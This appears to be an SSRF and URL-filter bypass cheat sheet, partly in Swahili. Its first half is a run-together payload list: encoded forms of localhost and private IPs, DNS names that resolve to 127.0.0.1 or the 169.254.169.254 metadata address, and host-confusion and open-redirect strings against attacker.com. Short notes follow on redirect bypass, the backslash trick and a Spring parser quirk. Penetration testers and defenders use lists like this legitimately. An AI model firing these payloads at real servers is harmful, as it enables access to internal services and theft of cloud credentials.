# Localhosthttp://127.0.0.1:80http://127.0.0.1:443http://127.0.0.1:22http://127.1:80http://127.000000000000000.1http://0http:@0/-->http://localhost/http://0.0.0.0:80http://localhost:80http://[::]:80/http://[::]:25/SMTPhttp://[::]:3128/Squidhttp://[0000::1]:80/http://[0:0:0:0:0:ffff:127.0.0.1]/thefilehttp://①②⑦.⓪.⓪.⓪# CDIR bypasshttp://127.127.127.127http://127.0.1.3http://127.0.0.0# Dot bypass127。0。0。1127%E3%80%820%E3%80%820%E3%80%821# Decimal bypasshttp://2130706433/=http://127.0.0.1http://3232235521/=http://192.168.0.1http://3232235777/=http://192.168.1.1# Octal Bypasshttp://0177.0000.0000.0001http://00000177.00000000.00000000.00000001http://017700000001# Hexadecimal bypass127.0.0.1=0x7f000001http://0x7f000001/=http://127.0.0.1http://0xc0a80014/=http://192.168.0.200x7f.0x00.0x00.0x010x0000007f.0x00000000.0x00000000.0x00000001# Mixed encodings bypass169.254.43518 -> PartialDecimal (Class B) format combines the third and fourth parts of the IP address into a decimal number0xA9.254.0251.0376 -> hexadecimal,decimalandoctal# Add 0s bypass127.000000000000.1# You can also mix different encoding formats# https://www.silisoftware.com/tools/ipconverter.php# Malformed and rarelocalhost:+11211aaalocalhost:00011211aaaahttp://0/http://127.1http://127.0.1# DNS to localhostlocaltest.me=127.0.0.1customer1.app.localhost.my.company.127.0.0.1.nip.io=127.0.0.1mail.ebc.apple.com=127.0.0.6 (localhost)127.0.0.1.nip.io=127.0.0.1 (Resolves tothegivenIP)www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us=Resolvestowww.google.comhttp://customer1.app.localhost.my.company.127.0.0.1.nip.iohttp://bugbounty.dod.network=127.0.0.2 (localhost)1ynrnhl.xip.io==169.254.169.254spoofed.burpcollaborator.net=127.0.0.1
The Burp extensionBurp-Encode-IP inatekeleza njia za kupita muundo wa IP.
# Try also to change attacker.com for 127.0.0.1 to try to access localhost# Try replacing https by http# Try URL-encoded charactershttps://{domain}@attacker.comhttps://{domain}.attacker.comhttps://{domain}%6D@attacker.comhttps://attacker.com/{domain}https://attacker.com/?d={domain}https://attacker.com#{domain}https://attacker.com@{domain}https://attacker.com#@{domain}https://attacker.com%23@{domain}https://attacker.com%00{domain}https://attacker.com%0A{domain}https://attacker.com?{domain}https://attacker.com///{domain}https://attacker.com\{domain}/https://attacker.com;https://{domain}https://attacker.com\{domain}/https://attacker.com\.{domain}https://attacker.com/.{domain}https://attacker.com\@@{domain}https://attacker.com:\@@{domain}https://attacker.com#\@{domain}https://attacker.com\anything@{domain}/https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com# On each IP position try to put 1 attackers domain and the others the victim domainhttp://1.1.1.1&@2.2.2.2#@3.3.3.3/#Parameter pollutionnext={domain}&next=attacker.com
Paths and Extensions Bypass
Ikiwa unahitajika kwamba URL lazima ikamilike kwa njia au kiambatisho, au lazima iwe na njia, unaweza kujaribu moja ya bypass zifuatazo:
The tool recollapse inaweza kuunda tofauti kutoka kwa ingizo lililotolewa ili kujaribu kupita regex inayotumika. Angalia hii posti pia kwa maelezo zaidi.
Automatic Custom Wordlists
Angalia URL validation bypass cheat sheet webapp kutoka portswigger ambapo unaweza kuingiza mwenyeji aliyetengwa na waandishi wa shambulio na itaunda orodha ya URLs za kujaribu kwako. Pia inazingatia ikiwa unaweza kutumia URL katika parameter, katika kichwa cha Host au katika kichwa cha CORS.
Bypass via redirect
Inaweza kuwa inawezekana kwamba server inachuja ombio la asili la SSRF lakini sio jibu la redirect lililowezekana kwa ombi hilo.
Kwa mfano, server iliyo hatarini kwa SSRF kupitia: url=https://www.google.com/ inaweza kuwa inachuja paramu ya url. Lakini ikiwa unatumia server ya python kujibu na 302 kwa mahali unapotaka kuelekeza, unaweza kuwa na uwezo wa kupata anwani za IP zilizochujwa kama 127.0.0.1 au hata protokali zilizochujwa kama gopher.
Angalia ripoti hii.
The backslash-trick inatumia tofauti kati ya WHATWG URL Standard na RFC3986. Wakati RFC3986 ni mfumo wa jumla wa URIs, WHATWG ni maalum kwa URLs za wavuti na inakubaliwa na vivinjari vya kisasa. Tofauti kuu iko katika kutambuliwa kwa WHATWG standard kwa backslash (\) kama sawa na forward slash (/), ikihusiana na jinsi URLs zinavyosomwa, hasa ikionyesha mpito kutoka kwa jina la mwenyeji hadi njia katika URL.
Left square bracket
Character ya “left square bracket” [ katika sehemu ya userinfo inaweza kusababisha UriComponentsBuilder ya Spring kurudisha thamani ya jina la mwenyeji ambayo inatofautiana na vivinjari: https://example.com[@attacker.com